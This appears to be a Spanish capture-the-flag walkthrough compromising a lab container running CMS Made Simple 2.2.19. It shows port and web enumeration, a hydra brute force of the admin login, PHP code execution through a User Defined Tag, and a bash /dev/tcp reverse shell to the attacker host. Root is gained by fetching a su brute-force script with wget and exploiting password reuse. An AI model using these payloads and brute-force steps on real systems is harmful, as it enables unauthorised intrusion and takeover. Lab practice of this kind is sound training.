# Enumeracion de Puerto, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script 'vuln' --min-rate 5000 -vvv 172.17.0.2 -oN nmap

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))

# Fuzzing Web

feroxbuster -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -d 10 -x txt,php,html,js,py,jpg,png

───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       22l      105w     5952c http://172.17.0.2/icons/ubuntu-logo.png
200      GET      364l      975w    10737c http://172.17.0.2/
200      GET      364l      975w    10737c http://172.17.0.2/index.html
[####################] - 38s  1661072/1661072 0s      found:3       errors:0      
[####################] - 37s  1661032/1661032 44978/s http://172.17.0.2/

>> Busqueda de Subdominios:

wfuzz -H "Host: FUZZ.172.17.0.2" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://172.17.0.2 --hl 10

<SIN RESULTADOS DE SUBDOMINIOS>

------------------------------------------------------------------------------------------------------------------------------------------------

Chequeamos la pagina principal http://172.17.0.2 y nos conseguimos con la plantilla de apache, si revisamos el codigo fuente vemos un comentario:

	<!-- cms made simple is installed here - Access to it - cmsms -->


chequeamos en http://172.17.0.2/index.html y nos conseguimos con otra plantilla de apache pero a diferencia de la primera que tenia el logo de
ubuntu, esta tiene el logo de debian y si chequeamos el codigo fuente conseguimos otro comentario:

<!-- 
¡Hola, Peter!
¿Te acuerdas los libros que te presté de esteganografía? ¿A que estaban buenísimos?
Aquí te dejo una clave que usaras sabiamente en el momento justo. Por favor, no seas tan obvio, la vida no se trata de fuerza bruta.
@UX=h?T9oMA7]7hA7]:YE+*g/GAhM4
Solo te comento, recuerdo que usé este método porque casi nadie lo usa... o si. Lamentablemente, a mi también se me olvido. Solo recuerdo que era base
-->

tenemos por un lado un posible usuario: Peter
y por otro lado tenemos >> @UX=h?T9oMA7]7hA7]:YE+*g/GAhM4 << que segun entendemos esta codificado en base algo, segun me parece, puede ser base85
asi que lo vamos a validar en la web: https://www.dcode.fr/ascii-85-encoding y el resultado que obtenemos es: base_85_decoded_password

probamos acceso por ssh con el user Peter y lo que decodificamos pero no resulta, volviendo al primer comentario que conseguimos pruebo 
acceder a http://172.17.0.2/cms, http://172.17.0.2/index.html/cms y no resulta! asi que tras intentaar con http://172.17.0.2/cmsms
tenemos resultados, por lo que volveremos aplicar fuzzing pero sobre este directorio

gobuster dir -u http://172.17.0.2/cmsms/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,txt,html,py,js,png,jpg -t 100 -b 404 

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 19671]
/modules              (Status: 301) [Size: 316] [--> http://172.17.0.2/cmsms/modules/]
/.html                (Status: 403) [Size: 275]
/uploads              (Status: 301) [Size: 316] [--> http://172.17.0.2/cmsms/uploads/]
/doc                  (Status: 301) [Size: 312] [--> http://172.17.0.2/cmsms/doc/]
/admin                (Status: 301) [Size: 314] [--> http://172.17.0.2/cmsms/admin/]
/assets               (Status: 301) [Size: 315] [--> http://172.17.0.2/cmsms/assets/]
/lib                  (Status: 301) [Size: 312] [--> http://172.17.0.2/cmsms/lib/]
/config.php           (Status: 200) [Size: 0]
/tmp                  (Status: 301) [Size: 312] [--> http://172.17.0.2/cmsms/tmp/]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

ahora chequeamos http://172.17.0.2/cmsms y tras revisar conseguimos un user: admin y la version de CMS Made Simple: version 2.2.19

accedemos al panel de login en http://172.17.0.2/cmsms/admin/ probamos con la password decodificada y el user admin y Peter pero
sin resultaados asi que capturamos una peticion con burpsuite y aplicamos un ataque al panel de login con hydra


hydra -l admin -P /home/darks/Desktop/linux/Kali/diccionarios/rockyou.txt 172.17.0.2 http-post-form "/cmsms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"
[80][http-post-form] host: 172.17.0.2   login: admin   password: chocolate

accedemos con las credenciales encontradas {admin:chocolate} y buscamos un exploit para la version de cms y conseguimos lo siguiente:

nos vamos a:
Extensions > User Defined Tags > Add User Defined Tag

name: payload
code: <?php echo system('id'); ?>
submit

ahora le damos a editar el Tags > payload > run > yes > {uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)}

tenemos ejecucion remota de comandos, asi que nos ponemos en escucha por netcat y editamos el codigo del Tags que creamos <payload> por lo siguiente:

<?php echo system("bash -c '/bin/bash -i >& /dev/tcp/172.17.0.1/4445 0>&1'"); ?>

ejecutamos el comando la primera vez y vuelve a ejecutar el comando anterior, asi que lo volvemos a ejecutar y aparentemente no pasa nada pero 
chequeamos netcat y hemos recibido la reverse shell

# Escalada de Privilegios

script /dev/null -c bash 
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash
cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
cms:x:1000:1000:cms,,,:/home/cms:/bin/bash

solo existe un user en el sistema: cms

sudo -l	
find / -perm -4000 2>/dev/null
find / -name '*.txt' 2>/dev/null
find / -name 'pass*' 2>/dev/null

nada esta funcionando, lo que se me ocurre es realizar un ataque de diccionario contro el user cms y root
asi que levantamos un server python desde nuestra maquina atacante para compartir un script y un diccionario

-----------------------------------------------------------------------------------------------
				desde nuestra maquina atacante	

python3 -m http.server 80			| para compartir un script y un diccionario

_______________________________________________________________________________________________
				desde la maquina vulnerada

wget http://172.17.0.1/Linux-Su-Force.sh
wget http://172.17.0.1/rockyou.txt
chmod +x Linux-Su-Force.sh

./Linux-Su-Force.sh cms rockyou.txt			| sin resultados con este user
./Linux-Su-Force.sh root rockyou.txt

Contraseña encontrada para el usuario root: chocolate

estaban reutilizando password ya que era la misma del login web, asi que escalamos

su root
pass: chocolate
# root
